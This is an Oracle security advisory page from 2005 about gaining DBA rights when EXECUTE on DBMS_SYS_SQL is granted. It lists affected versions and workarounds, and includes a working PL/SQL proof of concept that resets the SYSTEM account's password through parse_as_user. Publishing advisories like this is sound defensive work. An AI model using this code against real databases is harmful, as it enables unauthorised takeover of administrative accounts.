Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g
Name
Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g
Systems Affected
Oracle 8i / 9i / 10g
Severity
Low Risk
Category
Become DBA
Credit
Metalink Note:272381.1
Date
02 May 2005 (V 1.00)
Details
The following test case is from Oracle itself. A test case is nothing else than an exploit or proof of concept code. This test case allows to become DBA if the permission on DBMS_SYS_SQL are granted . By default only XDB has execute permission. Sometimes PORTAL30, PORTAL30_SSO and OAS_PUBLIC has also execute permission on DBMS_SYS_SQL.
Metalink note 112271.1 gives the following advice:
grant execute privileges on DBMS_SYS_SQL to the (default user) OAS_PUBLIC.
BE CAREFUL DOING THIS...
Workarounds
Never grant DBMS_SYS_SQL to public;
Example
declare
uid number;
sqltext varchar2(100) := 'alter user system identified by hacker';
myint integer;
begin
select user_id into uid from all_users where username like 'SYSTEM';
myint:=sys.dbms_sys_sql.open_cursor();
sys.dbms_sys_sql.parse_as_user(myint,sqltext,dbms_sql.native,UID);
sys.dbms_sys_sql.close_cursor(myint);
end ;
/
Patch Information
No patch required. Never grant DBMS_SYS_SQL to public.
ゥ 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.